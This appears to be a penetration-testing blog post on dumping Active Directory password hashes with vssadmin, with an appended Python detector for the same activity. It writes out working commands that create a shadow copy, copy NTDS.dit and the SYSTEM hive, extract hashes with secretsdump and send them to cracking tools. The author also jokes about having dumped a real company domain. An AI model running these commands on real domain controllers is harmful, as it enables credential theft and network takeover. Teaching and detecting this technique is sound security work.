Extracting Domain Hashes: VSSAdmin
Published: 19 October 2020
We covered extracting domain hashes with Mimikatz previously, but that's not always the best approach - for example, where anti-virus is getting in the way. However, there are other options for the same goal. This time around we'll take a look at using VSSAdmin, a built-in Windows tool.
VSSAdmin is the Volume Shadow Copy Administrative command-line tool, and it can be used to take a copy of the NTDS.dit file - the file that contains the Active Directory domain hashes.
From a domain controller, either directly or with a tool like PsExec, a shadow copy can be created with this command:
vssadmin create shadow /for=C:
The required files can then be copied from the shadow copy, like this:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\
Extracting the hashes locally from the NTDS.dit can be achieved with impacket-secretsdump, using a command like this:
impacket-secretsdump -ntds ntds.dit -system SYSTEM local
(Please excuse the pixelation, I didn't have a convenient lab domain to hand so I dumped the Akimbo domain...don't tell the boss.)
When secretsdump is finished, you'll have a pwdump file which you can crack with a tool like John the Ripper or Hashcat - so maybe check out our article on how we got 420 GH/s with Hashcat and AWS.
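From the blue-team side, the sequence above leaves a distinctive trail in process-creation telemetry. As an added example (not part of the original post), this Python correlates constructed sample records in the shape of Windows 4688 / Sysmon command lines: a vssadmin shadow creation followed within a few minutes by a copy of NTDS.dit or the SYSTEM hive out of a shadow device on the same host becomes a high-severity finding, while a lone shadow creation (which backup jobs do all the time) is only noted at low severity.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events: (host, UTC timestamp, command line). Not real telemetry.
SAMPLE_EVENTS = [
    ("DC01", "2020-10-19T09:00:01Z", r"C:\Windows\System32\vssadmin.exe create shadow /for=C:"),
    ("DC01", "2020-10-19T09:00:20Z",
     r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp\ntds.dit"),
    ("DC01", "2020-10-19T09:00:25Z",
     r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\temp\system"),
    ("FS02", "2020-10-19T02:00:00Z", r"C:\Windows\System32\vssadmin.exe list shadows"),
    ("FS02", "2020-10-19T02:00:05Z", r"C:\Windows\System32\vssadmin.exe create shadow /for=D:"),
]

# Stage 1: a shadow copy being created via vssadmin.
SHADOW_CREATE = re.compile(r"vssadmin(\.exe)?\s+create\s+shadow", re.I)
# Stage 2: a credential store (NTDS.dit or a registry hive) read from a shadow device path.
# Non-greedy so group(1) captures the path inside the shadow copy, not the destination.
SENSITIVE_FROM_SHADOW = re.compile(
    r"HarddiskVolumeShadowCopy\d+\\.*?(NTDS\.dit|config\\(SYSTEM|SAM|SECURITY))", re.I)


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def find_shadow_hive_theft(events, window=timedelta(minutes=10)):
    """Return {host: {"severity", "created", "artifacts"}}.

    "high": stage 1 followed by stage 2 on the same host within `window`.
    "low":  stage 1 alone, so routine backup activity is visible but not escalated.
    """
    creations = {}  # host -> time of most recent shadow creation
    findings = {}
    for host, ts, cmd in sorted(events, key=lambda e: e[1]):
        t = parse_ts(ts)
        if SHADOW_CREATE.search(cmd):
            creations[host] = t
            continue
        m = SENSITIVE_FROM_SHADOW.search(cmd)
        if m and host in creations and t - creations[host] <= window:
            entry = findings.setdefault(
                host, {"severity": "high", "created": creations[host], "artifacts": []})
            entry["artifacts"].append(m.group(1))
    for host, t in creations.items():
        findings.setdefault(host, {"severity": "low", "created": t, "artifacts": []})
    return findings


if __name__ == "__main__":
    for host, f in find_shadow_hive_theft(SAMPLE_EVENTS).items():
        print(host, f["severity"], f["artifacts"])
```

The same logic applies to live Security 4688 or Sysmon Event ID 1 data, provided command-line auditing is enabled (4688 does not record the command line by default).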